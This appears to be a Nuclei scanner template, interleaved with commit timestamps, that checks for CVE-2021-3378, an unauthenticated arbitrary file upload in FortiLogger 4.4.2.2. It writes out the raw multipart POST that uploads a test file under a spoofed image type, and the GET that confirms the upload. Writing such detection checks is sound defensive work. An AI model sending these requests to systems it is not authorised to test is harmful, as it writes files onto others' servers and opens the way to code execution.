2021-03-01 00:32:59 +00:00
id : CVE-2021-3378
info :
2022-05-18 20:58:07 +00:00
name : FortiLogger 4.4.2.2 - Arbitrary File Upload
2021-03-01 00:32:59 +00:00
author : dwisiswant0
severity : critical
description : |
2022-05-18 20:58:07 +00:00
FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.
2022-04-22 10:38:41 +00:00
reference :
- https://erberkan.github.io/2021/cve-2021-3378/
2022-05-17 09:18:12 +00:00
- https://github.com/erberkan/fortilogger_arbitrary_fileupload
- http://packetstormsecurity.com/files/161601/FortiLogger-4.4.2.2-Arbitrary-File-Upload.html
- http://packetstormsecurity.com/files/161974/FortiLogger-Arbitrary-File-Upload.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-3378
cwe-id : CWE-434
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:*
epss-score : 0.19666
2022-09-01 10:51:29 +00:00
tags : fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2021-03-01 00:32:59 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-01 08:45:16 +00:00
- raw :
- |
POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
Accept : application/json
Referer : {{BaseURL}}
Connection : close
X-Requested-With : XMLHttpRequest
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition : form-data; name="file"; filename="poc.txt"
2021-03-05 08:29:13 +00:00
Content-Type : image/png
2021-03-01 08:45:16 +00:00
POC_TEST
------WebKitFormBoundarySHHbUsfCoxlX1bpS
- |
GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1
Host : {{Hostname}}
2021-03-01 00:33:25 +00:00
matchers-condition : and
2021-03-01 00:32:59 +00:00
matchers :
- type : status
status :
- 200
- type : word
words :
2021-03-01 08:45:16 +00:00
- "POC_TEST"
2021-03-01 00:32:59 +00:00
part : body
2021-03-01 08:45:16 +00:00
2021-03-01 00:32:59 +00:00
- type : word
words :
2021-03-01 08:45:16 +00:00
- "text/plain"
2021-03-01 00:32:59 +00:00
- "ASP.NET"
condition : and
2022-05-18 20:58:07 +00:00
part : header
# Enhanced by mp on 2022/05/18